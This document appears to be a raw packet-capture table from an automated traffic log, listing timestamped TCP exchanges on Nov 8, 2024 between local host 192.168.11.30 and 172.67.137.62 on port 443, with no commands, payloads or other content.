                                                                                      Nov 8, 2024 10:46:20.368309021 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.368410110 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.368504047 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.368594885 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.368597984 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.368753910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.368762970 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.368823051 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369015932 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369070053 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369219065 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369323015 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369328022 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.369410992 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369518042 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.369609118 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.378163099 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.378174067 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.378571987 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.378581047 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.378591061 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.379358053 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.379369020 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.379765987 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.379776001 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.379786015 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.379786015 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.379918098 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.380395889 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.380404949 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.380727053 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.380736113 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.380832911 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.380832911 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.381418943 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.381428003 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.381663084 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.381671906 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.381767035 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.381907940 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.385665894 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.385675907 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.385819912 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.385926962 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.385977030 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.386147976 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.386157036 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.386265993 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.386265993 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.386421919 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.386457920 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.386691093 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.386807919 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391079903 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391089916 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391345024 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391403913 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391415119 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391423941 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391428947 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391516924 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391526937 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391583920 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391669035 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391772985 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391829014 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.391834974 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.391972065 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.392081022 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.392112970 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.392451048 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.392457008 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.392621994 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.392961025 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.394391060 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.394399881 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.394584894 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.394635916 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.394646883 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.394747972 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.394800901 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.394809961 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.394962072 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.395092010 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.395184040 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.395374060 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.395453930 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.396277905 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.396286964 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.396541119 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.396570921 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.396616936 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.396717072 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.396740913 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.396745920 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.396951914 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.397160053 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.398313999 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.398324013 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.398557901 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.398650885 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.398691893 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.398695946 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.398808002 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.398894072 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.399431944 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.399442911 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.399707079 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.399847031 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.399852991 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.399899960 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.400089979 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.400368929 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.400378942 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.400630951 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.400690079 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.400789976 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.400794983 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.400887966 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.401082993 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.401396036 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.401405096 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.401616096 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.401731968 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.401808977 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.401813984 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.401926994 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.402031898 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.403230906 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.403239012 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.403544903 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.403687954 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.403697014 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.403739929 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.403868914 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.404102087 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.404109955 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.404361010 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.404370070 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.404416084 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.404572010 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.405145884 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.405154943 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.405550003 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.405559063 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.405725956 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.405884981 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.406374931 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.406383991 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.406677008 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.406768084 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.406776905 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.406985044 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.407047987 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.409650087 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.409658909 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.409847021 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.410068035 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.410087109 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.410087109 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.410096884 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.410213947 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.410377026 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.416157961 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.416171074 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.416357040 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.416373014 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.416383028 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.416579008 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.416584015 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.416630983 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.416697025 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.416873932 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.416897058 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417033911 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417042017 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.417083025 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417176962 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417298079 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417399883 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417579889 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417753935 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.417848110 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.470041037 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.591607094 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.591753960 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.591804981 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.591847897 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.591965914 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.591976881 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.592044115 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.592072964 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.592186928 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.592324972 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.592473030 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.592482090 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.592564106 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.592571020 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.592734098 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.592941046 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.592947960 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.593019009 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.593383074 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.593390942 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.593530893 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.593878984 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.593889952 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.593970060 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.593975067 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.593985081 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.594372988 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.594383001 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.594439030 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.594722986 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.595024109 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.595031977 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.595503092 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.595513105 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.595607042 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.595762968 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.596033096 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.596040964 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.596334934 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.596391916 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.596401930 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.596596003 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.596664906 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.596960068 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.596967936 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.597232103 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.597460985 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.597470999 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.597843885 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.597965002 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.597973108 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.598793983 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.598793983 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.598793983 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.598793983 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.598805904 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.598942995 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.598953009 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.599248886 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.599258900 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.599313021 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.599419117 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.599571943 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.600008965 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.600017071 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.600416899 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.600424051 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.600491047 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.600584984 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.601130009 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.601138115 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.601274967 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.601464987 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.601588964 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.601593971 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.601715088 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.601922989 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.602075100 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.602271080 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.602353096 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.603017092 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.603022099 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.603024006 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.603028059 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.603298903 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.603780031 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.604031086 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.604038954 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.604430914 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.604437113 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.604641914 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.606738091 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.606749058 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.606950998 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.607018948 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.607018948 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.607027054 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.607333899 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.607338905 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.607475042 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.607475042 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.607480049 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.607706070 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.607837915 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.617296934 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.617307901 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.617537022 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.617571115 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.617580891 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.617707014 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.617717028 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.617783070 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.617863894 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.617933035 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.617942095 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.618036032 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.618046045 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.618201971 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.618211985 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.618278027 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.618427038 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.618472099 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.618536949 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.618680000 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.618684053 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.618849039 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.618865013 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619005919 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619009972 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.619138956 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619256973 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619398117 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619537115 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619630098 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619633913 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.619875908 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.619941950 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.620074987 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.620151043 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:20.831978083 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:20.876199007 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:21.087964058 CET44349770172.67.137.62192.168.11.30
